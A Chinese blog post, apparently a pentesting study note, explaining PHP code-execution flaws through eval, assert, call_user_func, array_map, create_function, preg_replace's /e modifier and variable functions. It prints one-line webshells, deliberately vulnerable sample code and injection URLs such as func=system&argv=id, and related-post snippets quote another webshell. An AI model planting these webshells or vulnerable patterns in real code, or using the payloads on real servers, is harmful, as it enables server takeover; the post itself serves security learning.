代码执行漏洞总结

最新推荐文章于 2024-03-29 15:59:26 发布
最新推荐文章于 2024-03-29 15:59:26 发布
阅读量1.5k 收藏 10
点赞数
分类专栏: 漏洞知识总结 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014794539/article/details/119085532
版权

代码执行漏洞是把代码注入到Web服务器中执行,而命令执行漏洞执行的系统命令 ,

代码执行漏洞

有的应用程序提供了一些可以将字符串作为代码执行的函数,如果对这些函数控制不严格,就可能被攻击者利用,执行恶意代码

eval函数

eval函数把字符串作为PHP代码执行

eval(string $code)

eval实例代码 比如一句话木马

<?php @eval($_POST[1])?>

assert函数

assert函数检查一个断言是否为FALSE

bool assert(mixed $assertion[,Throwable $exception])

assert函数会检查指定的assertion并在结果为FALSE时采取适当的行动,如果assertion是字符串,他会被assert函数当做PHP代码执行
示例

<?php @assert($_POST[1])?>

call_user_func函数

把第一个参数作为回调函数调用

mixed call_user_func(callable $callback[,mixed $parameter[,mined $parameter...]])

第一个参数callback是被调用的回调函数 其余参数是回调函数用的参数
示例代码
一句话木马的变形代码 通过POST型fun参数调用system函数,通过POST型arg参数传入id命令,执行了system('id')返回当前用户信息

<?php call_user_func($_POST['fun'],$_POST['arg']);?>

call_user_func_arrey函数

把第一个参数作为回调函数调用 把参数数组作为回调函数的参数调用

mixed call_user_func_arrey(callable $callback,array $param_arr)

示例代码
一句话木马的变形代码 通过POST型fun参数调用system函数,通过POST型arg参数传入id命令,执行了system('id')返回当前用户信息

<?php call_user_func_array($_POST['fun'],$_POST['arg']);?>

create_function函数

根据传递的参数创建匿名函数 并为该匿名函数返回唯一名称

string create_function(string $args,string $code)

示例代码

<?php
	$id=$_GET['id'];
	$code='echo'.$func.'test'.$id.';';
	create_function('$func',$code);
?>

create_function函数会创建虚拟函数,转变成以下代码

<?php
	$id=$_GET['id'];
	function func($func){
 	echo "test".$id;
  }
?>

当传入id的值为1;}phpinfo();/*时 就可以造成 代码执行

array_map函数

为数组的每个元素应用回调函数

array array_map(callable $callback,array $array1[,array $array2...])

函数返回为每个数组元素应用callback函数之后的数组,callback函数形参的数量和传给array_map函数的数组和数量必须相同
示例

<?php
	$func=$_GET['func'];
	$argv=$_GET['argv'];
	$array[0]=$argv;
	array_map($func,$array);
?>

输入语句

http://xxx/index.php?func=system&argv=id

就可以执行任意代码

preg_replace函数

执行一个正则表达式的搜索和替换

mixed preg_replace(mixed $pattern,mixed $replacement,mixed $subject[,int $limit=-1[,int &$count]])

示例

<?php
	$subject='hello hack';
	$pattern='/hack/'
	$replacement=$_GET["name"];
	echo preg_replace($pattern,$replacement,$subject);
?>

测试语句

http://xxx/index.php?name=tom

preg_replace函数会将hack替换成tom
此函数存在模式修饰符 其中修饰符e会让函数将替换后的函数作为PHP代码执行
(以eval函数方式)
如果设置了这个被弃用的修饰符 ,函数对替换字符进行后向引用替换之后 ,将替换后的字符串作为PHP代码评估执行,并使用执行结果作为实际参与替换的字符串,单引号 双引号反斜线和Null字符在后向引用替换式会被自动加上反斜线转义
示例

<?php
	$subject='hello hack';
	$pattern='/hack/e'
	$replacement=$_GET["name"];
	echo preg_replace($pattern,$replacement,$subject);
?>

测试语句

http://xxx/index.php?name=phpinfo()

会将hack替换成phpinfo()同时因为有e修饰符 会将phpinfo()当做代码执行

php可变函数

如果一个变量名后有圆括号 ,Php将寻找与变量值同名的函数并执行他,这意味着Php中可以把函数名通过字符串的方式传递给一个变量然后通过此变量动态调用函数

<?php 
 function foo(){
    echo "foo";
    echo "<br>";
 }

 function bar(){
     echo "bar";
     echo "<br>";
 }

 function echoit($string){
  echo $string;
   echo "<br>";
 }

 $func='foo';
 $func();
 $func='bar';
 $func('test');
 $func='echoit';
 $func('test')
 ?>

在这里插入图片描述
虽然PHP可变函数给开发人员带来了极大地便利,但同时也带来了极大地安全隐患,如果函数的名称可以被用户控制,而且没有做好过滤,就可能会造成恶意函数的执行。

Php可变函数漏洞示例代码:

<?php 
 function foo(){
    echo "foo";
    echo "<br>";
 }

 function bar($arg=''){
     echo "bar";
     echo "<br>";
 }

 function echoit($string){
  echo $string;
   echo "<br>";
 }

$func=$_REQUEST['func'];
$string=$_REQUEST['string'];
echo $func($string);

 ?>

在这里插入图片描述

参考文章

PHP代码执行漏洞
命令执行和代码执行

Pale1c
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP编程中的常见漏洞代码实例
12-18
不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。 如何通过全局变量进行攻击? PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很少初始化变量。 很显然,基于PHP的应用程序的主函数一般都是接受用户的输入(主要是表单变量,上载文件
代码执行漏洞总结.xmind
05-30
代码执行漏洞总结.xmind
常见21种漏洞编码安全规范及解决方案
weixin_44185213的博客
08-20 5147
常见21种漏洞编码安全规范
常见代码漏洞介绍
最新发布
晨港飞燕的专栏
03-29 851
ESAPI 提供了一系列的安全功能,包括输入验证、输出编码、会话管理、加密和访问控制等,帮助开发人员防御常见的 Web 安全威胁,如 XSS(跨站脚本攻击)、CSRF(跨站请求伪造)、SQL 注入等。这种行为可能是恶意的,旨在隐藏攻击者的活动,模糊攻击的痕迹,或者误导系统管理员、安全团队等人员的调查方向。这可能包括添加不存在的事件,或者伪造与真实事件相关的日志信息。总的来说,ESAPI 是一个强大的工具,旨在帮助开发人员构建更安全的 Web 应用程序,减少安全漏洞的风险,并保护用户数据的安全。
代码执行漏洞
heiseweiye的博客
09-27 7611
简述代码执行漏洞: PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行。该漏洞主要存在于eval()、assert()、preg_replace()、call_user_func()、array_map()以及动态函数中。 1.eval和assert函数 1.1 eval()函数是将输入的字符串当做PHP代码执行,assert()会检查指定的 assertion 并在结果...
PHP代码函数的执行漏洞
知足且坚定,温柔且上进
04-07 1685
eval函数 eval()函数可以将参数中的变量值执行,通常处于处理模板和动态加载PHP代码,但也常常被攻击者利用,比如一句话后门程序: <?php eval($_GET[cmd])?> assert()函数 assert()函数在PHP中用来判断一个表达式是否成立,返回真或假。如果直接将PHP代码传入也会被执行。 <?php assert($_GET["cmd"]);?&g...
一段漏洞百出的代码
alunlee的专栏
03-17 726
下面是一段漏洞百出的代码:#include string.h>#include stdio.h>class Base...{  private:    char * name;  public:    Base(char * className)    ...{        name = new char[strlen(className)];        strcpy(name, c
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行代码执行
weixin_52796034的博客
10-26 1535
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞
JAVA代码审计常用漏洞总结
12-11
主要代码审计方法是跟踪用户输入数据和敏感函数参数回溯: 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可...大多数漏洞的产生是因为函数的使用不当导致的,只要找到这些函数,就能够快速挖掘想要的漏洞
2016年iOS公开可利用漏洞总结
01-04
iOS的安全性远比大家的想象中脆弱,除了没有公开的漏洞以外,还有很多已经公开并且可被利用的漏洞,本报告总结了2016年比较严重的iOS漏洞(可用于远程代码执行或越狱),希望能够对大家移动安全方面的工作和研究带来...
漏洞总结详细翻译文档
02-20
一份详细的漏洞总结翻译文档 可执行代码远程攻击漏洞 库利用——允许执行 HTTP 查询漏洞 等等
一句话木马小总结
u014794539的博客
07-19 2154
一句话木马(简称Webshell)上传到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此 先来看看最简单的一句话木马: <?php @eval($_POST['attack' ]);?> 利用文件上传漏洞,往目标网站中上传一句话木马,然后就可以在本地通过管理工具即可获取和控制整个网站目录。 @表示后面即使执行错误,也不报错。 eval()函数表示括号内的语句字符串什么的全都当做代码执行 $_POST['attack']表示从页面中获得attack这个参
tomcat8弱口令&&后台getshell
u014794539的博客
07-16 1369
好哥哥的云服务器搭的靶场 已经知道 Tomcat manager 登录界面存在弱口令漏洞,登录成功后有上传点,压缩包 xxx.war的.war不会被解析,直接访问 xxx/里面的一句话路径,可直接拿到shell 这里是弱口令爆破 抓包上bp,看了一眼是 id:passwd 的形式 还有base64的编码 选择用Custom iterator拼接密码进行爆破 还要取消特殊字符的encode 最后得到密码进入后台的manager/html 将带有一句话的shell.jsp小马压缩成zip,并且将压缩后的
CVE-2017-15715(Apache解析漏洞)
u014794539的博客
07-25 987
Apache换行解析漏洞 影响版本:Apache 2.4.0~2.4.29 影响说明:绕过服务器策略,上传webshell 环境说明:PHP5.5 、 Apache2.4.10 漏洞复现利用如下 打开环境即是个文件上传点 先上潮汐看 Apache 百度搜一波 我们利用CVE-2017-15715(Apache换行解析漏洞) 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照php 后缀进行解析,导致绕过一些服务器的安全策
文件包含和伪协议漏洞知识总结
u014794539的博客
07-22 849
文件包含漏洞也是一种“注入型漏洞” 其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行 php常见的文件包含函数 require(),找不到被包含的文件时会产生致命错误,并停止脚本运行。 include(),找不到被包含的文件时只会产生警告,脚本将继续运行。 include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。 require_once()与require()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含。 ...
vulfocus漏洞复现
08-21
此外,还存在Drupal远程代码执行漏洞(CVE-2018-7600)和WordPress远程代码执行漏洞(CVE-2016-10033)。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1*...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值